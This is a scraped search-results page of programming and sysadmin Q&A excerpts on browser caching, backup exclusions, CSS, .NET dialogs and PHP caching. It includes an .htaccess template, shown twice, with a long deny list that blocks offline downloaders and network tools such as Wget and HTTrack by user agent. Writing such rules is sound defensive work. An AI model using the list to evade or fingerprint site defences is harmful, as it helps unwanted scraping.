Search Results

Search found 19411 results on 777 pages for 'browser cache'.

Page 186/777 | < Previous Page | 182 183 184 185 186 187 188 189 190 191 192 193  | Next Page >

  • What files should be excluded from a complete Windows backup?

    - by tro
    I'm starting to use CrashPlan to backup my Win 7 PC. I've got it writing to my external HD (for quick local restores) and to CrashPlan Central (for offsite storage). I'd like to backup my entire C:\ drive (the only partition) in a way that: Preserves all of my installed software and configuration, but Avoids backing up log files and other ephemeral / temporary files that are regenerated during normal operation of the OS. Which files and/or directories should I be excluding from backups? I'd like to make this a community wiki, so that we could all contribute towards a definitive list. Here's a list of regular expressions identifying the directories and files that CrashPlan excludes on Windows by default listed at http://support.crashplan.com/doku.php/articles/admin_excludes: .*/(?:42|\d{8,})/(?:cp|~).* (?i).*/CrashPlan.*/(?:cache|log|conf|manifest|upgrade)/.* .*\.part .*/iPhoto Library/iPod Photo Cache/.* .*\.cprestoretmp.* *\.rbf :/Config\\.Msi.* .*/Google/Chrome/.*cache.* .*/Mozilla/Firefox/.*cache.* .*\$RECYCLE\.BIN/.* .*/System Volume Information/.* .*/RECYCLER/.* .*/I386.* .*/pagefile.sys .*/MSOCache.* .*UsrClass\.dat\.LOG .*UsrClass\.dat .*/Temporary Internet Files/.* (?i).*/ntuser.dat.* .*/Local Settings/Temp.* .*/AppData/Local/Temp.* .*/AppData/Temp.* .*/Windows/Temp.* (?i).*/Microsoft.*/Windows/.*\.log .*/Microsoft.*/Windows/Cookies.* .*/Microsoft.*/RecoveryStore.* (?i).:/Config\\.Msi.* (?i).*\\.rbf .*/Windows/Installer.* Other excludes: .*\.(class|obj) .*/hiberfil.sys (?i).*\.tmp (?i).*/temp/ (?i).*/tmp/ .*Thumbs\.db .*/Local Settings/History/ .*/NetHood/ .*/PrintHood/ .*/Cookies/ .*/Recent/ .*/SendTo/

    Read the article

  • Apple iOS Apps and caching at the edge proxy

    - by Matthew Iselin
    Our network contains a growing number of iOS devices, all of which with very similar configurations. All Internet access is via a transparent proxy. We've found that iOS updates and some free apps cache fine on the proxy, but any paid apps fail to cache properly (as they seem to be encrypted to the Apple ID (?)). I'm just wondering if there's any way forward with this where we could cache the paid apps so that they are purchased n times, but downloaded from the proxy cache instead of from the Internet each time. Bandwidth caps aside, the download direct from the Internet slows everything down for everyone, regardless of fairness queueing and related 'fixes'. I know this is quite unlikely, but I figured there's nothing to lose and everything to gain before I look into other solutions (eg, QoS).

    Read the article

  • Strange groovy behavior when dealing with threads

    - by Misha Koshelev
    Dear All: I have an interesting dilemma. If I define my class as: class Browser { def swtException protected Object evaluate(script) throws SWTException { swtException=null display.syncExec() { try { result=swtBrowser.evaluate(script) } catch (SWTException swtException) { Browser.swtException=swtException } } } I get this rather interesting error: Exception in thread "Thread-5" org.eclipse.swt.SWTException: Failed to execute runnable (groovy.lang.MissingPropertyException: No such property: swtException for class : com.mksoft.fbautomate.browser.Browser Possible solutions: swtException) Any ideas??? Thank you! Misha

    Read the article

  • i want to have some cross browser consistency on my fieldsets, do you know how can i do it?

    - by Omar
    i have this problem with fieldsets... have a look at http://i.imgur.com/IRrXB.png is it possible to achieve what i want with css??? believe me, i tried! as you can see on the img, i just want the look of the legend to be consistent across browsers, i want it to use the width of the fieldset no more (like chrome and ie) no less (like firefox), dont worry about the rounded corners and other issues, thats taken care of. heres the the core i'm using. CSS <style type="text/css"> fieldset {margin: 0 0 10px 0;padding: 0; border:1px solid silver; background-color: #f9f9f9; -moz-border-radius:5px; -webkit-border-radius:5px; border-radius:5px} fieldset p{clear:both;margin:.3em 0;overflow:hidden;} fieldset label{float:left;width:140px;display:block;text-align:right;padding-right:8px;margin-right: 2px;color: #4a4a4a;} fieldset input, fieldset textarea {margin:0;border:1px solid #ddd;padding:3px 5px 3px 5px;} fieldset legend { background: #C6D1E8; position:relative; left: -1px; margin: 0; width: 100%; padding: 0px 5px; font-size: 1.11em; font-weight: bold; text-align:left; border: 1px solid silver; -webkit-border-top-left-radius: 5px; -webkit-border-top-right-radius: 5px; -moz-border-radius-topleft: 5px; -moz-border-radius-topright: 3px; border-top-left-radius: 5px; border-top-right-radius: 5px; } #md {width: 400px;} </style> HTML <div id="md"> <fieldset> <legend>some title</legend> <p> <label>Login</label> <input type="text" /> </p> <p> <label>Password</label> <input type="text" /> </p> <p><label>&nbsp;</label> <input type="submit"> </p> </fieldset> </div>

    Read the article

  • Why has Javascript been (mostly) only a browser-side technology for more than 10 years?

    - by Gabriel Cuvillier
    Recently there is a lot of projects that pushes Javascript into other directions: as a general purpose scripting language (GLUEScript, Rhino), as an extension language (QTScript, Adobe Reader, OO Macros), Widgets (Yahoo Widgets, MS Gadgets, Dashboard), and even server-side JS & web frameworks (CommonJS, Helma, Phobos, V8cgi), which seems obvious since it is already a language widely used for web development. But wait, everything is so new and nothing is really mature. However JS is around for almost 15 years, being as powerfull as any other scripting languages, being standardised by the ECMA, and being a mandatory technology for web development. Why did it take so much time to gain acceptance into other domains than web browsers?

    Read the article

  • Prevent users from being able to access a webpage via web browser?

    - by Rob
    My friend and I are working on a program. This program is going to submit GET data to our webpage. However, we don't want users accessing the webpage any other way than the program. We can prevent users from sharing the program using HWID authentication, but nothing prevents them from using a packet scanner to get the URL of the webpage. We thought about user-agent authentication, which we will implement, but user-agents can easily be spoofed. So my question is, how can we prevent users from accessing the webpage directly, instead of through the program? Even if you don't have an answer that will completely work, anything that will help deter them would be nice. Currently we will be implementing: HWID Authentication to use the program User-Agent Authentication to access the web page Instant IP Blacklisting to anyone accessing the webpage without the proper User-Agent

    Read the article

  • Is it possible to get code coverage data for a GWT web app running tests from the web browser?

    - by jeff
    I am not sure if this is possible but I would like some way to get code coverage information for tests that are written in Quick Test for our GWT based web app. It does not seem like there is any solution because the Quick Test Pro tests are testing against the GWT compiled app and not the original java code in which the app was written. I suppose I could get coverage data on the javascript that the GWT compiler creates, but there would be no way for me (that I know of) to map this information back to the original java code. Is there some way to do this?

    Read the article

  • Javascript How to automatically change word when click without need to refresh browser.?

    - by Fakhrul Zakry
    im quite lost here and not really expert about javascript. I want to change the content when user click with "Thanks for vote" automatically without need to refresh the page. Here is my html: {% if poll.privacy == "own" and request.user.get_profile.parliment != poll.location %} You do not have permission to vote this. {% else %} {% if has_vote %} {% if poll.rating_option == '1to5' %} <div class="rate"> <div id="poll-rate-{{ poll.pk }}"></div> </div> {% else %} Thanks for your vote. {% endif %} {% else %} {% if poll.rating_option == 'yes_no' %} <a href="javascript:void(0)" class="rate btn btn-xs btn-success mr5 vote-positive" rel="{% url 'vote_vote' poll.pk 1 %}" alt="{{ poll.pk }}">Yes</a> <a href="javascript:void(0)" class="rate btn btn-xs btn-danger vote-negative" rel="{% url 'vote_vote' poll.pk 0 %}" alt="{{ poll.pk }}">No</a> {% elif poll.rating_option == 'like_dislike' %} <a href="javascript:void(0)" class="rate btn btn-xs btn-success mr5 vote-positive" rel="{% url 'vote_vote' poll.pk 1 %}" alt="{{ poll.pk }}">Like</a> <a href="javascript:void(0)" class="rate btn btn-xs btn-danger vote-negative" rel="{% url 'vote_vote' poll.pk 0 %}" alt="{{ poll.pk }}">Dislike</a> {% elif poll.rating_option == '1to5' %} <div class="rate"> <div id="poll-rate-{{ poll.pk }}"></div> </div> {% endif %} {% endif %} {% endif %} and here is my javascript: function bindVoteHandler() { $('a.vote-positive, a.vote-negative').click(function(event) { event.preventDefault(); var link = $(this).attr('rel'); var poll_pk = $(this).attr('alt'); var selected_div = $(this).parent('div'); selected_div.html('<img src="{{ STATIC_URL }}img/loading_small.gif" />'); $.ajax(link).done(function( data ) { var result_div = $('div#vote-result-'+poll_pk); result_div.html(data); result_div.removeClass('vote-result-grey-out'); selected_div.html('<small>Thanks for your vote.</small>'); }); }); }; did anyone know what is the problem why i need to refresh my page after Like/Vote/rate to make it become (Thanks For your vote) ? please someone know help or share link with me. Below is the image: before click Like: after click Like: then when refreshed the word just displayed, it supposed automatically display when click Like. Thank you in advance..

    Read the article

  • .htaccess template, suggestions needed

    - by purpler
    DefaultLanguage en-US FileETag None Header unset ETag ServerSignature Off SetEnv TZ Europe/Belgrade # Rewrites Options +FollowSymLinks RewriteEngine On RewriteBase / # Redirect to WWW RewriteCond %{HTTP_HOST} ^serpentineseo.com RewriteRule (.*) http://www.serpentineseo.com/$1 [R=301,L] # Redirect index to root RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*index\.html\ HTTP/ RewriteRule ^(.*)index\.html$ /$1 [R=301,L] # Cache media files: ExpiresActive On ExpiresDefault A0 # Month <filesMatch "\.(gif|jpg|jpeg|png|ico|swf|js)$"> Header set Cache-Control "max-age=2592000, public" </filesMatch> # Week <FilesMatch "\.(css|pdf)$"> Header set Cache-Control "max-age=604800" </FilesMatch> # 10 Min <FilesMatch "\.(html|htm|txt)$"> Header set Cache-Control "max-age=600" </FilesMatch> # Do not cache <FilesMatch "\.(pl|php|cgi|spl|scgi|fcgi)$"> Header unset Cache-Control </FilesMatch> # Compress output <IfModule mod_deflate.c> <FilesMatch "\.(html|js|css)$"> SetOutputFilter DEFLATE </FilesMatch> </IfModule> # Error Documents ErrorDocument 206 /error/206.html ErrorDocument 401 /error/401.html ErrorDocument 403 /error/403.html ErrorDocument 404 /error/404.html ErrorDocument 500 /error/500.html # Prevent hotlinking RewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !^http://(www\.)?serpentineseo.com/.*$ [NC] RewriteRule \.(gif|jpg|png)$ http://www.serpentineseo.com/images/angryman.png [R,L] # Prevent offline browsers RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR] RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:[email protected] [OR] RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR] RewriteCond %{HTTP_USER_AGENT} ^Custo [OR] RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR] RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR] RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR] RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR] RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR] RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR] RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR] RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR] RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR] RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR] RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR] RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR] RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR] RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR] RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR] RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR] RewriteCond %{HTTP_USER_AGENT} ^HMView [OR] RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR] RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR] RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR] RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR] RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR] RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR] RewriteCond %{HTTP_USER_AGENT} ^larbin [OR] RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR] RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR] RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR] RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR] RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR] RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR] RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR] RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR] RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR] RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR] RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR] RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR] RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR] RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR] RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR] RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR] RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR] RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR] RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR] RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR] RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR] RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR] RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR] RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR] RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR] RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR] RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR] RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR] RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR] RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR] RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR] RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR] RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR] RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR] RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR] RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR] RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR] RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR] RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR] RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR] RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR] RewriteCond %{HTTP_USER_AGENT} ^Wget [OR] RewriteCond %{HTTP_USER_AGENT} ^Widow [OR] RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR] RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR] RewriteCond %{HTTP_USER_AGENT} ^Zeus RewriteRule ^.*$ http://www.google.com [R,L] # Protect against DOS attacks by limiting file upload size LimitRequestBody 10240000 # Deny access to sensitive files <FilesMatch "\.(htaccess|psd|log)$"> Order Allow,Deny Deny from all </FilesMatch>

    Read the article

  • .htaccess template, suggestions needed

    - by purpler
    # Defaults AddDefaultCharset UTF-8 DefaultLanguage en-US FileETag None Header unset ETag ServerSignature Off SetEnv TZ Europe/Belgrade # Rewrites Options +FollowSymLinks RewriteEngine On RewriteBase / # Redirect to WWW RewriteCond %{HTTP_HOST} ^serpentineseo.com RewriteRule (.*) http://www.serpentineseo.com/$1 [R=301,L] # Redirect index to root RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*index\.html\ HTTP/ RewriteRule ^(.*)index\.html$ /$1 [R=301,L] # Cache media files: ExpiresActive On ExpiresDefault A0 # Month <filesMatch "\.(gif|jpg|jpeg|png|ico|swf|js)$"> Header set Cache-Control "max-age=2592000, public" </filesMatch> # Week <FilesMatch "\.(css|pdf)$"> Header set Cache-Control "max-age=604800" </FilesMatch> # 10 Min <FilesMatch "\.(html|htm|txt)$"> Header set Cache-Control "max-age=600" </FilesMatch> # Do not cache <FilesMatch "\.(pl|php|cgi|spl|scgi|fcgi)$"> Header unset Cache-Control </FilesMatch> # Compress output <IfModule mod_deflate.c> <FilesMatch "\.(html|js|css)$"> SetOutputFilter DEFLATE </FilesMatch> </IfModule> # Error Documents ErrorDocument 206 /error/206.html ErrorDocument 401 /error/401.html ErrorDocument 403 /error/403.html ErrorDocument 404 /error/404.html ErrorDocument 500 /error/500.html # Prevent hotlinking RewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !^http://(www\.)?serpentineseo.com/.*$ [NC] RewriteRule \.(gif|jpg|png)$ http://www.serpentineseo.com/images/angryman.png [R,L] # Prevent offline browsers RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR] RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:[email protected] [OR] RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR] RewriteCond %{HTTP_USER_AGENT} ^Custo [OR] RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR] RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR] RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR] RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR] RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR] RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR] RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR] RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR] RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR] RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR] RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR] RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR] RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR] RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR] RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR] RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR] RewriteCond %{HTTP_USER_AGENT} ^HMView [OR] RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR] RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR] RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR] RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR] RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR] RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR] RewriteCond %{HTTP_USER_AGENT} ^larbin [OR] RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR] RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR] RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR] RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR] RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR] RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR] RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR] RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR] RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR] RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR] RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR] RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR] RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR] RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR] RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR] RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR] RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR] RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR] RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR] RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR] RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR] RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR] RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR] RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR] RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR] RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR] RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR] RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR] RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR] RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR] RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR] RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR] RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR] RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR] RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR] RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR] RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR] RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR] RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR] RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR] RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR] RewriteCond %{HTTP_USER_AGENT} ^Wget [OR] RewriteCond %{HTTP_USER_AGENT} ^Widow [OR] RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR] RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR] RewriteCond %{HTTP_USER_AGENT} ^Zeus RewriteRule ^.*$ http://www.google.com [R,L] # Protect against DOS attacks by limiting file upload size LimitRequestBody 10240000 # Deny access to sensitive files <FilesMatch "\.(htaccess|psd|log)$"> Order Allow,Deny Deny from all </FilesMatch>

    Read the article

  • WinForms: Why do I get InvalidCastException when showing folder browser dialog?

    - by Marek
    I am randomly getting InvalidCastException when showing FolderBrowserDialog and also many clients have reported this. I have not been able to find anything relevant on the internet. Does anyone know what causes this/how to fix this? My code: using (FolderBrowserDialog fbd = new FolderBrowserDialog()) { fbd.ShowNewFolderButton = false; if (fbd.ShowDialog() == DialogResult.OK) Stack trace: Error: System.InvalidCastException: 'Unable to cast object of type 'System.__ComObject' to type 'IMalloc'.'. Stack trace: at System.Windows.Forms.UnsafeNativeMethods.Shell32.SHGetMalloc(IMalloc[] ppMalloc) at System.Windows.Forms.FolderBrowserDialog.GetSHMalloc() at System.Windows.Forms.FolderBrowserDialog.RunDialog(IntPtr hWndOwner) at System.Windows.Forms.CommonDialog.ShowDialog(IWin32Window owner) at System.Windows.Forms.CommonDialog.ShowDialog() EDIT: Additional information: I have been able to reproduce this only when running in VS2008 debugger. When running out of debugger, it happens only very rarely (happened once or twice in 6 months) on my 64 bit Windows 7 and goes away after restart. The clients are certainly not running the app in debugger so it is surely reproducible out of debugger.

    Read the article

  • APC Not Enabled (WHM on CentOS)

    - by gamerzfuse
    I know this questions has been beat to death, but I've read almost all the responses and it hasn't solved my issue. I installed APC (no noted errors), I told PHP.ini to enable it and I made sure I am running PHP in FastCGI with SuExec turned off. Still I have no go. PHP / suEXEC Configuration Default PHP Version (.php files) 5 PHP 5 Handler fcgi PHP 4 Handler none Apache suEXEC off Apache Ruid2 off php.ini Configuration Alternative PHP Cache apc.enabled Alternative PHP Cache apc.shm_segments Alternative PHP Cache apc.shm_size When I run the APC.php file I get this message: No cache info available. APC does not appear to be running.

    Read the article

  • how to change link url on the web browser's status bar.

    - by sunglim
    I already read many article about this issue in here, SO. I just want to discuss how to do it. NOT the moral issue. -- for example. at the google search webpage. before I click the link, the link does not indicate the google url. but After I click the link with shift-key, the url on the status bar is changed. this mean the google webpage indicate 'Fake URL'. the google compressed script is too difficult to read and analyze. # edited The second url should work on ie8 even if I click with ctrl key.

    Read the article

  • Cross browser's probelm to highlight option item as bold in form element "select".

    - by Vivek
    Hello All , I am facing one weird cross browsers problem i.e. I want to highlight some of the option items as bold by using CSS class in my form element "select". This all is working fine in firefox only but not in other browsers like safari , chrome and IE .Given below is the code. <html> <head> <title>MAke Heading Bold</title> <style type="text/css"> .mycss {font-weight:bold;} </style> </head> <body> <form name="myform"> <select name="myselect"> <option value="one">one</option> <option value="two" class="mycss">two</option> <option value="three" >Three </option> </select> </form> </body> </html> Please suggest me best possible solution for this . Thanks Vivek

    Read the article

  • unable to install anything on ubuntu 9.10 with aptitude

    - by Srisa
    Hello, Earlier i could install software by using the 'sudo aptitude install ' command. Today when i tried to install rkhunter i am getting errors. It is not just rkhunter, i am not able to install anything. Here is the text output: user@server:~$ sudo aptitude install rkhunter ................ ................ 20% [3 rkhunter 947/271kB 0%] Get:4 http://archive.ubuntu.com karmic/universe unhide 20080519-4 [832kB] 40% [4 unhide 2955/832kB 0%] 100% [Working] Fetched 1394kB in 1s (825kB/s) Preconfiguring packages ... Selecting previously deselected package lsof. (Reading database ... ................ (Reading database ... 95% (Reading database ... 100% (Reading database ... 20076 files and directories currently installed.) Unpacking lsof (from .../lsof_4.81.dfsg.1-1_amd64.deb) ... dpkg: error processing /var/cache/apt/archives/lsof_4.81.dfsg.1-1_amd64.deb (--unpack): unable to create `/usr/bin/lsof.dpkg-new' (while processing `./usr/bin/lsof'): Permission denied dpkg-deb: subprocess paste killed by signal (Broken pipe) Selecting previously deselected package libmd5-perl. Unpacking libmd5-perl (from .../libmd5-perl_2.03-1_all.deb) ... Selecting previously deselected package rkhunter. Unpacking rkhunter (from .../rkhunter_1.3.4-5_all.deb) ... dpkg: error processing /var/cache/apt/archives/rkhunter_1.3.4-5_all.deb (--unpack): unable to create `/usr/bin/rkhunter.dpkg-new' (while processing `./usr/bin/rkhunter'): Permission denied dpkg-deb: subprocess paste killed by signal (Broken pipe) Selecting previously deselected package unhide. Unpacking unhide (from .../unhide_20080519-4_amd64.deb) ... dpkg: error processing /var/cache/apt/archives/unhide_20080519-4_amd64.deb (--unpack): unable to create `/usr/sbin/unhide-posix.dpkg-new' (while processing `./usr/sbin/unhide-posix'): Permission denied dpkg-deb: subprocess paste killed by signal (Broken pipe) Processing triggers for man-db ... Errors were encountered while processing: /var/cache/apt/archives/lsof_4.81.dfsg.1-1_amd64.deb /var/cache/apt/archives/rkhunter_1.3.4-5_all.deb /var/cache/apt/archives/unhide_20080519-4_amd64.deb E: Sub-process /usr/bin/dpkg returned an error code (1) A package failed to install. Trying to recover: Setting up libmd5-perl (2.03-1) ... Building dependency tree... 0% Building dependency tree... 50% Building dependency tree... 50% Building dependency tree Reading state information... 0% ........... .................... I have removed some lines to reduce the text. All the error messages are in here though. My experience with linux is limited and i am not sure what the problem is or how it is to be resolved. Thanks.

    Read the article

  • Disable static content caching in IIS 7

    - by Lee Richardson
    I'm a developer having what should be a relatively simple problem in IIS 7 on Windows Server 2008 R2. The problem is that IIS 7 is overzealously caching all static content on the server. It's caching all .html and .js content and not noticing when the content changes on disk unless I iisreset. I've tried the following: Deleting the local cache in my browser (I'm 99% positive this is a server caching issue) In IIS Admin in OutputCaching adding an .html extension and unchecking "User mode caching" and unchecking "Kernel-mode caching" In IIS Admin in OutputCaching adding an .html extension and checking "User mode caching" and selecting the radio for "Prevent all caching" In IIS Admin editing Output Cache Feature settings and unchecking "Enable cache" and "Enable kernel cache under OutputCaching. Running "C:\Windows\System32\inetsrv\config\appcmd set config "SharePoint - 80" -section: system.webServer/caching -enabled:false" Looking through applicationHost.config and disabling anything related to caching I could find. Nothing seems to work. I'm getting very frustrated. Can anyone please help?

    Read the article

  • What is the difference between these Pentium Extreme Edition CPUs?

    - by Giffyguy
    The CPU in question is the Pentium Extreme Edition 955. Intel's website shows four "versions", but for the most part they all look identical. They even share the same set of ordering codes. But one of them has a substantially lower TDP, which is seemingly unexplainable - since everything else is the same. Two of them say "LGA775, Tray" and I have no idea what "Tray" means either. Also, two of them have a different SPEC code. What I need to know is: What does "LGA775, Tray" mean? Why does the one CPU have a lower TDP? And what does that mean for me? Does that mean lower maximum power consumption? Does it mean the CPU may be more stable/endurant, because of a lower heat output? Why do two of them have a different SPEC code, and what does this mean? Finally, what does PLGA775 (as opposed to LGA775) mean, and do I need to be worried about that? Information from Intel's wbsite: Intel® Pentium® Processor Extreme Edition 955 (4M Cache, 3.46 GHz, 1066 MHz FSB) with SPEC Code 1 Boxed Intel® Pentium® Processor Extreme Edition 955 4M Cache, 3.46 GHz, 1066 MHz FSB LGA775 PLGA775 B1 95 Watts BX80553955 SL94N 2 Intel® Pentium® Processor Extreme Edition 955 4M Cache, 3.46 GHz, 1066 MHz FSB LGA775, Tray PLGA775 B1 130 Watts HH80553PH0994M SL94N 3 Boxed Intel® Pentium® Processor Extreme Edition 955 4M Cache, 3.46 GHz, 1066 MHz FSB LGA775 PLGA775 B1 130 Watts BX80553955 SL8WM 4 Intel® Pentium® Processor Extreme Edition 955 4M Cache, 3.46 GHz, 1066 MHz FSB LGA775, Tray PLGA775 B1 130 Watts HH80553PH0994M SL8WM

    Read the article

  • With a browser, how do I know which decimal separator does the client use?

    - by Quassnoi
    I'm developing a web application. I need to display some decimal data correctly so that it can be copied and pasted into a certain GUI application that is not under my control. The GUI application is locale sensitive and it accepts only the correct decimal separator which is set in the system. I can guess the decimal separator from Accept-Language and the guess will be correct in 95% cases, but sometimes it fails. Is there any way to do it on server side (preferably, so that I can collect statistics), or on client side? Update: The whole point of the task is doing it automatically. In fact, this webapp is a kind of online interface to a legacy GUI which helps to fill the forms correctly. The kind of users that use it mostly have no idea on what a decimal separator is. The Accept-Language solution is implemented and works, but I'd like to improve it. Update2: I need to retrive a very specific setting: decimal separator set in Control Panel / Regional and Language Options / Regional Options / Customize. I deal with four kinds of operating systems: Russian Windows with a comma as a DS (80%). English Windows with a period as a DS (15%). Russian Windows with a period as a DS to make poorly written English applications work (4%). English Windows with a comma as a DS to make poorly written Russian applications work (1%). All 100% of clients are in Russia and the legacy application deals with Russian goverment-issued 